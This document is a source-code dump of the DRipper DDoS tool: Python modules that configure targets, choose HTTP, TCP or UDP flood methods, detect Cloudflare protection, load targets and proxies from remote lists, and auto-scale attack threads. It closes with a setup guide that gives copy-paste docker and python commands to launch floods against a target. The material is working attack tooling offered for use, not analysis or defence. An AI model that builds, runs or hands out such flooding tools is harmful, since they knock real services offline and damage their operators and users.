| return Group(*parts) 133 | -------------------------------------------------------------------------------- /ripper/context/target.py: -------------------------------------------------------------------------------- 1 | import time 2 | from typing import Tuple 3 | from urllib.parse import urlparse 4 | 5 | from ripper.health_check_manager import HealthCheckManager 6 | from ripper import common 7 | from ripper.constants import * 8 | from ripper.stats.target_stats_manager import TargetStatsManager 9 | from ripper.time_interval_manager import TimeIntervalManager 10 | 11 | Attack = 'Attack' 12 | 13 | 14 | def default_scheme_port(scheme: str): 15 | scheme_lc = scheme.lower() 16 | if scheme_lc == 'http' or scheme_lc == 'tcp': 17 | return 80 18 | if scheme_lc == 'https': 19 | return 443 20 | if scheme_lc == 'udp': 21 | return 53 22 | return None 23 | 24 | 25 | class Target: 26 | index: int = 0 27 | """Target index for statistic.""" 28 | 29 | scheme: str 30 | """Connection scheme""" 31 | host: str 32 | """Original HOST name from input args. 
Can be domain name or IP address.""" 33 | host_ip: str 34 | """HOST IPv4 address.""" 35 | port: int 36 | """Destination Port.""" 37 | country: str = None 38 | """Country code based on target public IPv4 address.""" 39 | is_cloud_flare_protection: bool = False 40 | """Is Host protected by CloudFlare.""" 41 | attack_method: str 42 | """Current attack method.""" 43 | http_method: str 44 | """HTTP method used in HTTP packets""" 45 | 46 | min_random_packet_len: int 47 | """Minimum size for random packet length.""" 48 | max_random_packet_len: int 49 | """Limit for random packet length.""" 50 | 51 | attack_threads: list[Attack] = None 52 | """Attack-related threads.""" 53 | 54 | health_check_manager: HealthCheckManager = None 55 | time_interval_manager: TimeIntervalManager = None 56 | 57 | stats: TargetStatsManager = None 58 | """All the statistics collected separately by protocols and operations.""" 59 | 60 | @staticmethod 61 | def validate_format(target_uri: str) -> bool: 62 | try: 63 | result = urlparse(target_uri) 64 | return all([result.scheme, result.netloc]) 65 | except: 66 | return False 67 | 68 | def guess_attack_method(self): 69 | if self.scheme == 'http' or self.scheme == 'https': 70 | return 'http-flood' 71 | elif self.scheme == 'tcp': 72 | return 'tcp-flood' 73 | elif self.scheme == 'udp': 74 | return 'udp-flood' 75 | return None 76 | 77 | def __init__(self, target_uri: str, attack_method: str = None, http_method: str = ARGS_DEFAULT_HTTP_ATTACK_METHOD, 78 | min_random_packet_len: int = None, max_random_packet_len: int = None): 79 | self.attack_threads = [] 80 | self.http_method = http_method 81 | self.time_interval_manager = TimeIntervalManager() 82 | 83 | self.host_ip = DEFAULT_CURRENT_IP_VALUE 84 | self.country = GEOIP_NOT_DEFINED 85 | 86 | parts = urlparse(target_uri) 87 | self.scheme = parts.scheme 88 | # TODO rename host to hostname 89 | self.host = parts.hostname 90 | self.port = parts.port if parts.port is not None else default_scheme_port(parts.scheme) 91 | path = parts.path if parts.path else '/' 92 | query = parts.query if parts.query else '' 93 | self.http_path = path if not query else f'{path}?{query}' 94 | self.attack_method = attack_method if attack_method else self.guess_attack_method() 95 | 96 | self.health_check_manager = HealthCheckManager(target=self) 97 | self.stats = TargetStatsManager(target=self) 98 | 99 | if self.attack_method in ['http-flood', 'http-bypass']: 100 | self.min_random_packet_len = 0 if min_random_packet_len is None else min_random_packet_len 101 | self.max_random_packet_len = 0 if max_random_packet_len is None else max_random_packet_len 102 | else: 103 | self.min_random_packet_len = DEFAULT_MIN_RND_PACKET_LEN if min_random_packet_len is None else min_random_packet_len 104 | self.max_random_packet_len = DEFAULT_MAX_RND_PACKET_LEN if max_random_packet_len is None else max_random_packet_len 105 | self.min_random_packet_len = max(self.min_random_packet_len, 0) 106 | self.max_random_packet_len = max(self.max_random_packet_len, self.min_random_packet_len) 107 | 108 | def init(self): 109 | """Initialize target: get IPv4, country code and make initial checks.""" 110 | self.host_ip = common.get_ipv4(self.host) 111 | self.country = common.get_country_by_ipv4(self.host_ip) 112 | self.is_cloud_flare_protection = common.detect_cloudflare(self.uri) 113 | 114 | def add_attack_thread(self, attack: Attack): 115 | self.attack_threads.append(attack) 116 | 117 | def hostip_port_tuple(self) -> Tuple[str, int]: 118 | return self.host_ip, self.port 119 | 120 | def 
validate(self): 121 | """Validates target.""" 122 | if self.host_ip is None or not common.is_ipv4(self.host_ip): 123 | raise Exception(f'Cannot get IPv4 for HOST: {self.host}. Could not connect to the target HOST.') 124 | # XXX Should we call validate attack here as well? 125 | return True 126 | 127 | def cloudflare_status(self) -> str: 128 | """Get human-readable status for CloudFlare target HOST protection.""" 129 | return 'Protected' if self.is_cloud_flare_protection else 'Not protected' 130 | 131 | @property 132 | def http_url(self) -> str: 133 | """Get fully qualified HTTP URL for target HOST - http(s)://host:port/path""" 134 | http_protocol = 'https://' if self.port == 443 else 'http://' 135 | 136 | return f"{http_protocol}{self.host}:{self.port}{self.http_path}" 137 | 138 | @property 139 | def uri(self) -> str: 140 | """Get fully qualified URI for target HOST - schema://host:port""" 141 | 142 | return f"{self.scheme}://{self.host}:{self.port}{self.http_path}" 143 | 144 | def stop_attack_threads(self): 145 | for attack in self.attack_threads: 146 | attack.stop() 147 | 148 | ############################################### 149 | # Connection validators 150 | ############################################### 151 | def validate_connection(self, period_sec: int = SUCCESSFUL_CONNECTIONS_CHECK_PERIOD_SEC) -> bool: 152 | """ 153 | Check if there was successful connection for last time with interval of `period_sec`. 154 | Args: 155 | period_sec: Time interval in seconds to check for successful connection. 156 | """ 157 | period_ns = period_sec * 1000000 * 1000 158 | return self.stats.packets.connections_check_time + period_ns > time.time_ns() 159 | -------------------------------------------------------------------------------- /ripper/common.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import gzip 3 | import http.client 4 | import re 5 | import socket 6 | import random 7 | import os 8 | import subprocess 9 | import json 10 | import urllib.request 11 | 12 | import requests 13 | from rich import box 14 | from rich.console import Console 15 | from rich.panel import Panel 16 | 17 | from ripper.constants import * 18 | 19 | Target = 'Target' 20 | 21 | 22 | # Prepare static patterns once at start. 
23 | IPv4_PATTERN = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$") 24 | 25 | console = Console() 26 | 27 | 28 | def read_file_lines(filename: str) -> list[str]: 29 | """Read string from fs or http""" 30 | if filename.startswith('http'): 31 | return read_file_lines_http(filename) 32 | return read_file_lines_fs(filename) 33 | 34 | 35 | def read_file_lines_fs(filename: str) -> list[str]: 36 | """Read string from file""" 37 | with open(filename, 'r') as file: 38 | return file.readlines() 39 | 40 | 41 | def read_file_lines_http(url: str) -> list[str]: 42 | """Read string from http""" 43 | data = requests.get(url, timeout=30).text 44 | return data.splitlines() 45 | 46 | 47 | def strip_lines(lines: list[str]) -> list[str]: 48 | return list(map(lambda line: line.strip(), lines)) 49 | 50 | 51 | def generate_random_bytes(min_len: int, max_len: int) -> bytes: 52 | """Generate random packet bytes.""" 53 | # No need to generate random int if we max_len = min_len 54 | if min_len == max_len: 55 | return generate_fixed_size_random_bytes(max_len) 56 | return generate_fixed_size_random_bytes(random.randint(min_len, max_len)) 57 | 58 | 59 | def generate_fixed_size_random_bytes(len: int) -> bytes: 60 | """Generate random packet bytes.""" 61 | return random.randbytes(len) 62 | 63 | 64 | def get_current_ip() -> str: 65 | """Gets user IP with external service.""" 66 | current_ip = DEFAULT_CURRENT_IP_VALUE 67 | try: 68 | # Check if curl exists in Linux/macOS 69 | rc = subprocess.call(['which', 'curl'], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) if os.name == 'posix' else 1 70 | current_ip = os.popen('curl -s ifconfig.me').readline() \ 71 | if rc == 0 else urllib.request.urlopen('https://ifconfig.me').read().decode('utf8') 72 | except: 73 | pass 74 | 75 | return current_ip if is_ipv4(current_ip) else DEFAULT_CURRENT_IP_VALUE 76 | 77 | 78 | def ns2s(time_nano: int): 79 | return time_nano / 1000000 / 1000 80 | 81 | 82 | def s2ns(time_seconds: int): 83 | return int(time_seconds * 1000000 * 1000) 84 | 85 | 86 | def format_dt(dt: datetime, fmt=DATE_TIME_FULL) -> str: 87 | """Convert datetime to string using specified format pattern.""" 88 | if dt is None: 89 | return '' 90 | return dt.strftime(fmt) 91 | 92 | 93 | def is_ipv4(ip: str) -> bool: 94 | """Check if specified string - is IPv4 format.""" 95 | match = re.match(IPv4_PATTERN, ip) 96 | 97 | return bool(match) 98 | 99 | 100 | def get_ipv4(host: str) -> str: 101 | """Get target IPv4 address by domain name.""" 102 | if is_ipv4(host): 103 | return host # do not use socket if we already have a valid IPv4 104 | 105 | try: 106 | host_ip = socket.gethostbyname(host) 107 | if is_ipv4(host_ip): 108 | return host_ip 109 | except: 110 | pass 111 | else: 112 | return DEFAULT_CURRENT_IP_VALUE 113 | 114 | 115 | def get_country_by_ipv4(host_ip: str) -> str: 116 | """Gets country of the target's IPv4.""" 117 | if host_ip is None or not is_ipv4(host_ip): 118 | return GEOIP_NOT_DEFINED 119 | 120 | country = GEOIP_NOT_DEFINED 121 | try: 122 | # Sometimes ends up in HTTP Error 429: Too Many Requests 123 | # TODO support multiple services 124 | response_body = urllib.request.urlopen(f'https://ipinfo.io/{host_ip}', timeout=3).read().decode('utf8') 125 | response_data = json.loads(response_body) 126 | country = response_data['country'] 127 | except: 128 | pass 129 | 130 | return country 131 | 132 | 133 | def detect_cloudflare(uri: str): 134 | """Check response and detect if the host protected by CloudFlare.""" 135 | parsed_uri = urllib.request.urlparse(uri) 136 | 
domain = '{uri.netloc}'.format(uri=parsed_uri) 137 | scheme = '{uri.scheme}'.format(uri=parsed_uri) 138 | 139 | check = http.client.HTTPSConnection(domain, timeout=3) if scheme == 'https' \ 140 | else http.client.HTTPConnection(domain, timeout=3) 141 | 142 | headers = { 143 | 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143', 144 | 'Origin': 'https://google.com', 145 | 'Referer': f'https://www.google.com/search?q={domain}&sourceid=chrome&ie=UTF-8', 146 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 147 | 'Accept-Language': 'en-us,en;q=0.5', 148 | 'Accept-Encoding': 'gzip,deflate', 149 | 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 150 | 'Connection': 'keep-alive', 151 | 'Content-Type': 'text/html' 152 | } 153 | try: 154 | check.request(method='GET', url='/', headers=headers) 155 | gzipped = check.getresponse().read() 156 | response = gzip.decompress(gzipped).decode('utf-8') 157 | for tag in CLOUDFLARE_TAGS: 158 | if response.__contains__(tag): 159 | return True 160 | except: 161 | return False 162 | 163 | return False 164 | 165 | 166 | def convert_size(size_bytes: int, units: str = 'B') -> str: 167 | """Converts size in bytes to human-readable format.""" 168 | for x in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y']: 169 | if size_bytes < 1024.: return '{0:3.2f} {1}{2}'.format(size_bytes, x, units) 170 | size_bytes /= 1024. 171 | return '{0:3.2f} P{1}'.format(size_bytes, units) 172 | 173 | 174 | def get_cpu_load() -> str: 175 | if os.name == 'nt': 176 | pipe = subprocess.Popen('wmic cpu get loadpercentage', stdout=subprocess.PIPE) 177 | out = pipe.communicate()[0].decode('utf-8') 178 | out = out.replace('LoadPercentage', '').strip() 179 | 180 | return f'{out}%' 181 | else: 182 | load1, load5, load15 = os.getloadavg() 183 | cpu_usage = (load15 / os.cpu_count()) * 100 184 | 185 | return f"{cpu_usage:.2f}%" 186 | 187 | 188 | def print_panel(message: str, style: str = 'bold white on red') -> None: 189 | """Output message in the colorful box.""" 190 | console.print( 191 | Panel(message, box=box.ROUNDED), 192 | width=MIN_SCREEN_WIDTH, 193 | style=style) 194 | 195 | 196 | class Singleton(type): 197 | _instances = {} 198 | 199 | def __call__(cls, *args, **kwargs): 200 | if cls not in cls._instances: 201 | cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) 202 | return cls._instances[cls] 203 | -------------------------------------------------------------------------------- /ripper/targets_manager.py: -------------------------------------------------------------------------------- 1 | import time 2 | from enum import Enum 3 | from threading import Thread, Event, Lock 4 | from psutil import cpu_percent 5 | 6 | from ripper.context.target import Target 7 | from ripper.actions.attack import Attack 8 | from ripper.constants import * 9 | from ripper.context.events_journal import EventsJournal 10 | 11 | Context = 'Context' 12 | events_journal = EventsJournal() 13 | 14 | 15 | class ThreadsDistribution(Enum): 16 | Fixed = 'fixed', 17 | Auto = 'auto', 18 | 19 | 20 | class TargetsManagerPacketsStats: 21 | total_sent: int = 0 22 | total_sent_bytes: int = 0 23 | avg_sent_per_second: int = 0 24 | avg_sent_bytes_per_second: int = 0 25 | 26 | def __init__(self, targets: list[Target]) -> None: 27 | duration_seconds = None 28 | for target in targets: 29 | self.total_sent += target.stats.packets.total_sent 30 | self.total_sent_bytes += target.stats.packets.total_sent_bytes 31 | if 
duration_seconds is None: 32 | duration_seconds = target.time_interval_manager.execution_duration.total_seconds() 33 | if duration_seconds: 34 | self.avg_sent_per_second = self.total_sent / duration_seconds 35 | self.avg_sent_bytes_per_second = self.total_sent / duration_seconds 36 | 37 | def __ge__(self, other: 'TargetsManagerPacketsStats'): 38 | return self.avg_sent_per_second > other.avg_sent_per_second \ 39 | and self.avg_sent_bytes_per_second > other.avg_sent_bytes_per_second 40 | 41 | def __lt__(self, other: 'TargetsManagerPacketsStats'): 42 | return self.avg_sent_per_second < other.avg_sent_per_second \ 43 | and self.avg_sent_bytes_per_second < other.avg_sent_bytes_per_second 44 | 45 | def __eq__(self, other: 'TargetsManagerPacketsStats'): 46 | return self.avg_sent_per_second == other.avg_sent_per_second \ 47 | and self.avg_sent_bytes_per_second == other.avg_sent_bytes_per_second 48 | 49 | 50 | class AutomaticThreadsDistribution: 51 | _packet_stats: TargetsManagerPacketsStats = None 52 | _targets_manager: 'TargetsManager' = None 53 | _interval_delay_seconds: int = None 54 | _stop_event: Event = None 55 | _failed_tests_cnt: int = 0 56 | """Count of failed performance improvements checks after scale up""" 57 | 58 | def __init__(self, targets_manager: 'TargetsManager', interval_delay_seconds: int = DEFAULT_AUTOSCALE_TEST_SECONDS) -> None: 59 | self._targets_manager = targets_manager 60 | self._interval_delay_seconds = interval_delay_seconds 61 | self._stop_event = Event() 62 | 63 | def scale_up(self): 64 | threads_count = self._targets_manager.threads_count 65 | new_threads_count = threads_count + self._targets_manager.targets_count() 66 | events_journal.info(f'Scale up from {threads_count} to {new_threads_count}') 67 | self._targets_manager.set_threads_count(new_threads_count) 68 | self._targets_manager.allocate_attacks() 69 | 70 | def __runner__(self): 71 | while not self._stop_event.is_set(): 72 | time.sleep(self._interval_delay_seconds) 73 | current_packet_stats = TargetsManagerPacketsStats(targets=self._targets_manager.targets) 74 | if self._packet_stats: 75 | if self._packet_stats < current_packet_stats and cpu_percent(5) < MAX_AUTOSCALE_CPU_PERCENTAGE: 76 | self._failed_tests_cnt = 0 77 | self.scale_up() 78 | else: 79 | self._failed_tests_cnt += 1 80 | if self._failed_tests_cnt >= MAX_FAILED_FAILED_AUTOSCALE_TESTS: 81 | self.stop() 82 | self._packet_stats = current_packet_stats 83 | 84 | def start(self): 85 | events_journal.info(f'Start automatic threads distribution') 86 | Thread(target=self.__runner__).start() 87 | 88 | def stop(self): 89 | events_journal.info(f'Stop automatic threads distribution') 90 | self._stop_event.set() 91 | 92 | 93 | class TargetsManager: 94 | _targets: list[Target] = None 95 | _ctx: Context = None 96 | _lock: Lock = None 97 | _threads_count: int = None 98 | _threads_distribution: ThreadsDistribution = None 99 | 100 | def __init__(self, _ctx: Context, threads_count: int = 1, threads_distribution: ThreadsDistribution = ThreadsDistribution.Fixed): 101 | self._targets = [] 102 | self._ctx = _ctx 103 | self._lock = Lock() 104 | self._threads_count = threads_count 105 | self._threads_distribution = threads_distribution 106 | 107 | @property 108 | def free_threads_count(self): 109 | total = self.threads_count 110 | self._lock.acquire() 111 | for target in self._targets: 112 | total -= len(target.attack_threads) 113 | self._lock.release() 114 | return total 115 | 116 | @property 117 | def targets(self): 118 | return self._targets[:] 119 | 120 | @property 121 
|     def threads_count(self):
122 |         return self._threads_count
123 | 
124 |     @property
125 |     def threads_distribution(self):
126 |         return self._threads_distribution
127 | 
128 |     def set_threads_count(self, threads_count: int):
129 |         # We can't have fewer threads than targets
130 |         self._threads_count = max(threads_count, len(self._targets))
131 | 
132 |     def set_auto_threads_distribution(self):
133 |         self._threads_distribution = ThreadsDistribution.Auto
134 |         atd = AutomaticThreadsDistribution(targets_manager=self)
135 |         atd.start()
136 | 
137 |     def add_target(self, target):
138 |         self._targets.append(target)
139 |         target_idx = self._targets.index(target)
140 |         target.index = target_idx
141 |         # We can't have fewer threads than targets
142 |         self._threads_count = max(self._threads_count, len(self._targets))
143 | 
144 |     def delete_target(self, target: Target, is_stop_attack: bool = True, is_allocate_attacks: bool = True):
145 |         if is_stop_attack:
146 |             target.stop_attack_threads()
147 |         self._lock.acquire()
148 |         try:
149 |             target_idx = self._targets.index(target)
150 |             self._targets.pop(target_idx)
151 |         except ValueError:
152 |             pass
153 |         self._lock.release()
154 |         if is_allocate_attacks:
155 |             self.allocate_attacks()
156 | 
157 |     def allocate_attacks(self):
158 |         free_threads_count = self.free_threads_count
159 |         if free_threads_count < 1:
160 |             return
161 |         self._lock.acquire()
162 |         targets_cnt = len(self._targets)
163 |         if targets_cnt > 0:
164 |             # Spread the free threads round-robin across the remaining targets
165 |             for idx in range(free_threads_count):
166 |                 target = self._targets[idx % targets_cnt]
167 |                 Attack(_ctx=self._ctx, target=target).start()
168 |         self._lock.release()
169 | 
170 |     def targets_count(self):
171 |         return len(self._targets)
172 | 
--------------------------------------------------------------------------------
/ripper/context/context.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | from rich.console import Console
4 | 
5 | from _version import __version__
6 | 
7 | from ripper.github_updates_checker import Version
8 | from ripper import common
9 | from ripper.constants import *
10 | from ripper.proxy_manager import ProxyManager
11 | from ripper.socket_manager import SocketManager
12 | from ripper.stats.context_stats_manager import ContextStatsManager
13 | from ripper.stats.ip_info import IpInfo
14 | from ripper.context.events_journal import EventsJournal
15 | from ripper.targets_manager import TargetsManager
16 | from ripper.headers_provider import HeadersProvider
17 | from ripper.time_interval_manager import TimeIntervalManager
18 | from ripper.duration_manager import DurationManager
19 | from ripper.context.target import Target
20 | 
21 | events_journal = EventsJournal()
22 | 
23 | 
24 | class Context(metaclass=common.Singleton):
25 |     """Class (Singleton) for passing a context to parallel processes."""
26 | 
27 |     targets_manager: TargetsManager = None
28 | 
29 |     # ==== Input params ====
30 |     proxy_list: str
31 |     """File with proxies in ip:port:username:password or ip:port line format."""
32 |     proxy_type: str
33 |     """Type of proxy to work with. 
34 |     dry_run: bool = False
35 |     """Is dry run mode."""
36 | 
37 |     # ==== Statistics ====
38 |     latest_version: Version = None
39 |     current_version: Version = None
40 |     myIpInfo: IpInfo = None
41 |     """All the info about IP addresses and GeoIP information."""
42 | 
43 |     # ==========================================================================
44 |     cpu_count: int
45 |     """vCPU count of the current machine."""
46 | 
47 |     # ==== Internal variables ====
48 |     headers_provider: HeadersProvider = None
49 |     """HTTP Headers used to make Requests."""
50 | 
51 |     # External API and services info
52 |     sock_manager: SocketManager = None
53 |     proxy_manager: ProxyManager = None
54 |     time_interval_manager: TimeIntervalManager = None
55 |     duration_manager: DurationManager = None
56 |     logger: Console = None
57 |     stats: ContextStatsManager = None
58 | 
59 |     is_health_check: bool
60 |     """Controls health check availability. Turn on: 1, turn off: 0."""
61 | 
62 |     @staticmethod
63 |     def _getattr(obj, name: str, default):
64 |         value = getattr(obj, name, default)
65 | 
66 |         return value if value is not None else default
67 | 
68 |     def __init__(self, args):
69 |         self.current_version = Version(__version__)
70 |         attack_method = getattr(args, 'attack_method', None)
71 | 
72 |         self.logger = Console(width=MIN_SCREEN_WIDTH)
73 | 
74 |         self.targets_manager = TargetsManager(_ctx=self)
75 | 
76 |         self.logger.log('Getting your current Public IPv4 address...')
77 |         self.myIpInfo = IpInfo(common.get_current_ip())
78 |         self.logger.log(f'Your start Public IPv4 is: {self.myIpInfo.ip_masked}')
79 | 
80 |         self.headers_provider = HeadersProvider()
81 |         self.sock_manager = SocketManager()
82 |         self.proxy_manager = ProxyManager()
83 |         self.time_interval_manager = TimeIntervalManager()
84 |         self.duration_manager = DurationManager(duration_seconds=getattr(args, 'duration', None))
85 |         self.is_health_check = bool(getattr(args, 'health_check', ARGS_DEFAULT_HEALTH_CHECK))
86 |         self.dry_run = getattr(args, 'dry_run', False)
87 |         self.sock_manager.socket_timeout = self._getattr(args, 'socket_timeout', ARGS_DEFAULT_SOCK_TIMEOUT)
88 |         self.proxy_type = getattr(args, 'proxy_type', ARGS_DEFAULT_PROXY_TYPE)
89 |         self.proxy_list = getattr(args, 'proxy_list', None)
90 | 
91 |         # os.cpu_count() may return None if it cannot be determined
92 |         self.cpu_count = os.cpu_count() or 1
93 | 
94 |         self.connections_check_time = time.time_ns()
95 | 
96 |         if self.proxy_list and attack_method != 'udp-flood':
97 |             self.proxy_manager.set_proxy_type(self.proxy_type)
98 |             try:
99 |                 self.proxy_manager.update_proxy_list_from_file(self.proxy_list)
100 |             except Exception as e:
101 |                 events_journal.exception(e)
102 |                 events_journal.error('Proxy list read operation failed.')
103 | 
104 |             # Proxies are slower, so we need to double the socket timeouts
105 |             if self.proxy_manager.proxy_list_initial_len:
106 |                 self.sock_manager.socket_timeout *= 2
107 | 
108 |         if args and getattr(args, 'targets_list', None):
109 |             targets_file: str = getattr(args, 'targets_list', None)
110 |             message = f'Downloading targets from {targets_file}...' if targets_file.startswith('http') else 'Reading targets from file...'
111 |             self.logger.log(message)
112 |             input_targets = common.read_file_lines(targets_file)
113 |             self.logger.log(f'Loaded list with {len(input_targets)} targets')
114 |         else:
115 |             # Fall back to targets passed directly via the -s (--targets) argument
116 |             input_targets = getattr(args, 'targets', [])
117 | 
118 |         _http_method = getattr(args, 'http_method', ARGS_DEFAULT_HTTP_ATTACK_METHOD).upper()
119 |         _min_random_packet_len = getattr(args, 'min_random_packet_len', None)
120 |         _max_random_packet_len = getattr(args, 'max_random_packet_len', None)
121 |         for target_uri in input_targets:
122 |             if '#' in target_uri or '://' not in target_uri:
123 |                 continue
124 |             with self.logger.status('Configure attacks...') as status:
125 |                 status.update(f' Configuring attack for [cyan]{target_uri}[/]', spinner='aesthetic')
126 |                 target = Target(
127 |                     target_uri=target_uri,
128 |                     attack_method=attack_method,
129 |                     # TODO move http_method to target_uri to allow each target have its own method
130 |                     http_method=_http_method,
131 |                     min_random_packet_len=_min_random_packet_len,
132 |                     max_random_packet_len=_max_random_packet_len,
133 |                 )
134 |                 self.targets_manager.add_target(target)
135 | 
136 |         arg_threads_count = getattr(args, 'threads_count', ARGS_DEFAULT_THREADS_COUNT)
137 |         if arg_threads_count == 'auto':
138 |             self.targets_manager.set_auto_threads_distribution()
139 |         else:
140 |             threads_count = int(arg_threads_count) if not self.dry_run else 1
141 |             self.targets_manager.set_threads_count(threads_count)
142 | 
143 |         self.stats = ContextStatsManager(_ctx=self)
144 | 
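    # NOTE: validate() below is called from ripper/services.py::main() right before the
    # attack threads are allocated; it only verifies that at least one target survived
    # parsing and that the public IPv4 address could be detected.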
145 |     def validate(self):
146 |         """Validates the context before the script runs. Order matters!"""
147 |         if self.targets_manager.targets_count() < 1:
148 |             self.logger.log(NO_MORE_TARGETS_LEFT_ERR_MSG)
149 |             exit(1)
150 | 
151 |         # try:
152 |         #     for target in self.targets_manager.targets:
153 |         #         target.validate()
154 |         # except Exception as e:
155 |         #     self.logger.log(str(e))
156 |         #     exit(1)
157 | 
158 |         if self.myIpInfo.start_ip is None or not common.is_ipv4(self.myIpInfo.start_ip):
159 |             self.logger.log(
160 |                 'Cannot get your public IPv4 address. Check your VPN connection.')
161 |             exit(1)
162 | 
--------------------------------------------------------------------------------
/docs/SetupGuide.md:
--------------------------------------------------------------------------------
1 | # How to install and update DRipper
2 | 
3 | **DRipper** can be run in two ways - in Docker or as a Python script. Comparing the two, running directly with Python uses your PC's resources more efficiently, while Docker gives you an isolated environment where you do not need to install or configure anything, at the cost of noticeably higher resource usage.
4 | 
5 | ## What you need to install first
6 | 
7 | To run it in Docker, you first need to install Docker for your operating system.
8 | To run it as a Python script, you need Python 3.9 (or a newer version) and Git.
9 | 
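Before going further, you can quickly confirm that the prerequisites are in place. A minimal check (the versions reported will differ on your machine; any Docker, Python 3.9+ and Git will do):

```bash
# Check the Docker installation (only needed for the Docker way)
docker --version

# Check Python and Git (only needed for the Python-script way)
python3 --version   # must be 3.9 or newer
git --version
```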
10 | ### Running with Docker
11 | 
12 | To run it with Docker, open a terminal (PowerShell on Windows, Bash on macOS/Linux) and simply run a single command.
13 | 
14 | **Windows PowerShell**
15 | ```powershell
16 | PS C:\> docker run -it --rm --pull=always alexmon1989/dripper:latest -t 200 -s tcp://site1.com:80
17 | ```
18 | 
19 | **macOS/Linux Bash**
20 | ```bash
21 | $ docker run -it --rm --pull=always alexmon1989/dripper:latest -t 200 -s tcp://site1.com:80
22 | ```
23 | 
24 | Both commands are identical: they download the latest **docker image** and start an attack with the given parameters.
25 | In this example the attack parameters are **-t 200 -s tcp://site1.com:80**, where **-t 200** is the number of threads and **-s tcp://site1.com:80** is the target.
26 | 
27 | ---
28 | 
29 | ### Running the Python script
30 | 
31 | If you have not installed **DRipper** yet, you need to download the current version and install all the libraries required by the script - it is very simple.
32 | 
33 | Open a terminal (PowerShell on Windows, Bash on macOS/Linux) and change to the directory (folder) where the script files will be downloaded, for example:
34 | 
35 | **Windows PowerShell**
36 | ```powershell
37 | # Create the dripper folder in the root of drive C:
38 | PS C:\> mkdir C:\dripper
39 | # Change to the folder where dripper will be downloaded
40 | PS C:\> cd C:\dripper
41 | 
42 | # Download the current version from the git repository
43 | PS: C:\dripper\> git clone https://github.com/alexmon1989/russia_ddos
44 | PS: C:\dripper\> cd russia_ddos
45 | 
46 | ## Install all required libraries
47 | PS: C:\dripper\russia_ddos\> python3 -m pip install -r requirements.txt
48 | 
49 | ## Run the script
50 | PS: C:\dripper\russia_ddos\> python3 DRipper.py -t 200 -s tcp://site1.com:80
51 | ```
52 | 
53 | **macOS/Linux Bash**
54 | ```bash
55 | # Create the dripper folder in the user's home directory (Home folder)
56 | ~ $ mkdir ~/dripper
57 | # Change to the folder where dripper will be downloaded
58 | ~ $ cd ~/dripper
59 | 
60 | # Download the current version from the git repository
61 | ~/dripper $ git clone https://github.com/alexmon1989/russia_ddos
62 | ~/dripper $ cd russia_ddos
63 | 
64 | ## Install all required libraries
65 | ~/dripper/russia_ddos $ python3 -m pip install -r requirements.txt
66 | 
67 | ## Run the script
68 | ~/dripper/russia_ddos $ python3 DRipper.py -t 200 -s tcp://site1.com:80
69 | ```
70 | 
71 | ---
72 | 
73 | ## Updating DRipper
74 | 
75 | ### For **Docker** there are several options:
76 | 
77 | - Always use the `latest` tag and add `--pull=always`, for example: `--pull=always alexmon1989/dripper:latest`
78 | - Use the **docker image** with the new version by specifying the version explicitly, for example: `alexmon1989/dripper:2.5.0`
79 | 
80 | ### Some examples:
81 | 
82 | Suppose you currently have version **2.4.0** and want to update to the latest **2.5.0** using **Docker**
83 | 
84 | ```bash
85 | # Update to the current version using the latest tag
86 | docker run -it --rm --pull=always alexmon1989/dripper:latest --version
87 | 
88 | # Update to the current version using the version as a tag
89 | docker run -it --rm alexmon1989/dripper:2.5.0 --version
90 | ```
91 | 
92 | Overall, the update strategy is very simple: you can switch to a new version as soon as it is released simply by using the version as a tag, or, if you use the `latest` tag, add `--pull=always` to your docker run command from time to time, for example once a week.
93 | 
94 | 
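If you are not sure which image version you already have locally, you can check it with standard Docker commands before deciding whether to update (shown here only as an illustration):

```bash
# List the dripper images that are already downloaded locally
docker image ls alexmon1989/dripper

# Ask the image itself which DRipper version it contains
docker run -it --rm alexmon1989/dripper:latest --version
```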
95 | ### For Python the update is very simple
96 | 
97 | To update, just download the latest changes with **git** and re-run the installation of the libraries. To do that, open a terminal, change to the script's directory and run just two commands:
98 | 
99 | ```bash
100 | cd russia_ddos
101 | 
102 | git pull
103 | 
104 | python3 -m pip install -r requirements.txt
105 | ```
106 | 
107 | After that you can run the commands and perform attacks.
108 | 
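If you prefer to stay on a specific release instead of the latest state of the repository, one possible approach (a sketch using standard git commands; `2.5.0` is just an example tag) is to check out the corresponding release tag:

```bash
# Fetch and list the available release tags
git fetch --tags
git tag --list

# Switch to a specific release, e.g. 2.5.0, and reinstall the libraries
git checkout 2.5.0
python3 -m pip install -r requirements.txt
```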
109 | ---
110 | 
111 | ## Help with the script parameters
112 | 
113 | If you do not know which parameters the script has and what they affect, you can always run the `--help` command and see in detail what each parameter is used for, for example:
114 | 
115 | ```bash
116 | # Docker
117 | docker run -it --rm alexmon1989/dripper:latest --help
118 | 
119 | # Python
120 | python3 DRipper.py --help
121 | 
122 | # Example of the --help command output:
123 | Usage: DRipper.py [options] arg
124 | 
125 | Options:
126 |   --version             show program's version number and exit
127 |   -h, --help            show this help message and exit
128 |   -s TARGETS, --targets=TARGETS  Attack target in {scheme}://{hostname}[:{port}][{path}] format.
129 |                         Multiple targets allowed.
130 |   -m ATTACK_METHOD, --method=ATTACK_METHOD  Attack method: udp-flood, tcp-flood, http-flood, http-bypass
131 |   -e HTTP_METHOD, --http-method=HTTP_METHOD  HTTP method. Default: GET
132 |   -t THREADS_COUNT, --threads=THREADS_COUNT  Total threads count. Default: 100
133 |   -r RANDOM_PACKET_LEN, --random-len=RANDOM_PACKET_LEN  Send random packets with random length. Default: 1
134 |   -l MAX_RANDOM_PACKET_LEN, --max-random_packet-len=MAX_RANDOM_PACKET_LEN
135 |                         Max random packets length. Default: 1024 for udp/tcp
136 |   -y PROXY_LIST, --proxy-list=PROXY_LIST  File (fs or http/https) with proxies in
137 |                         ip:port:username:password line format. Proxies will be ignored
138 |                         in udp attack!
